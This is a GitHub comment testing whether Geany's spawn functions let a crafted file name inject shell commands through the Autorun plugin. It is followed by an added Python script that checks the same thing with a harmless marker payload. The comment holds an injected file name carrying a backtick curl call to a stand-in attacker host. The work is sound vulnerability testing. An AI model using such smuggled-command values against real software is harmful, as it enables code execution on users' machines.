WrapEarnPass left a comment (geany/geany-plugins#1584)

Does [geany](https://www.geany.org/manual/reference/spawn_8h.html) spawn_sync 
or spawn_with_callbacks suffer from this vulnerability by default?
geany/testing,now 2.1-2 from debian.
Autorun@ecb8948276418a7eef897b5adb516181a5c72706 (before g_shell_quote was 
shoved in as a mitigation)
src/spawn.c@229 ```spawn_with_callbacks(current_cmd->working_dir, current_cmd->command, NULL```: an unescaped "command with arguments" put in the command and not the argv of spawn_with_callbacks
src/spawn.c@287 ```spawn_sync(current_cmd->working_dir, current_cmd->command, NULL```: an unescaped "command with arguments" put in the command and not the argv of spawn_sync

Action performed: save File ```'test`curl evil.example |tee test.file`.c'``` 
which should invoke the Autorun C Before-Save@287 and On-Save@229 commands.
Safe results: Command not runnable, or a clang-format and clang-tidy error.
Indication of compromise: A curl error about evil.example, or test.file 
creation in WD

Actual results

<img width="1359" height="525" alt="Image" src="https://github.com/user-attachments/assets/1398fd44-1cd1-4ad6-a544-76e1df666416" />

No test.file was created.

Both spawn_with_callbacks and spawn_sync are not vulnerable regardless of 
whether or not the command is escaped.

Since the ```g_spawn_command_line_sync``` and other invocations are not geany 
library calls, I would have to rely on the maintainer of each plugin to 
determine they have used those calls correctly, as I am not familiar with them.
I am updating the initial list to remove the known non-impacted library calls.
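
An added example, not part of the comment above or of Geany's code: a Python check that repeats the test's logic with a harmless marker payload, comparing a command line split into argv and executed directly against the same string handed to `/bin/sh -c`, both unescaped and quoted. Assumptions: `echo` stands in for the Autorun command, `shlex.split` for argv-style parsing, and `shlex.quote` for `g_shell_quote`; whether Geany's spawn functions parse this way is not stated on the page.

```python
import os
import shlex
import subprocess
import tempfile

# Constructed file name modelled on the one in the comment; the backtick
# payload is a harmless `touch`, so the only side effect is a marker file.
FILENAME = "test`touch marker`.c"


def build_command_line(filename: str, quote: bool) -> str:
    """Append the file name to a stand-in command (assumption: `echo`)."""
    return "echo " + (shlex.quote(filename) if quote else filename)


def payload_ran(command_line: str, via_shell: bool) -> bool:
    """Run command_line in a scratch directory; True if the marker appears."""
    with tempfile.TemporaryDirectory() as wd:
        if via_shell:
            # The whole string goes to /bin/sh, which expands backticks.
            argv = ["/bin/sh", "-c", command_line]
        else:
            # Word splitting only: backticks stay literal bytes in argv.
            argv = shlex.split(command_line)
        subprocess.run(argv, cwd=wd, stdout=subprocess.DEVNULL,
                       stderr=subprocess.DEVNULL, check=False)
        return os.path.exists(os.path.join(wd, "marker"))


def run_matrix() -> dict:
    """Results for unescaped/quoted command lines on both execution paths."""
    results = {}
    for quote in (False, True):
        line = build_command_line(FILENAME, quote)
        for via_shell in (False, True):
            results[(quote, via_shell)] = payload_ran(line, via_shell)
    return results


if __name__ == "__main__":
    for (quote, via_shell), ran in sorted(run_matrix().items()):
        print(f"quoted={quote!s:5} shell={via_shell!s:5} payload_ran={ran}")
```

Only the unescaped string passed to a shell creates the marker; the argv path leaves the backticks literal whether or not the name is quoted.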



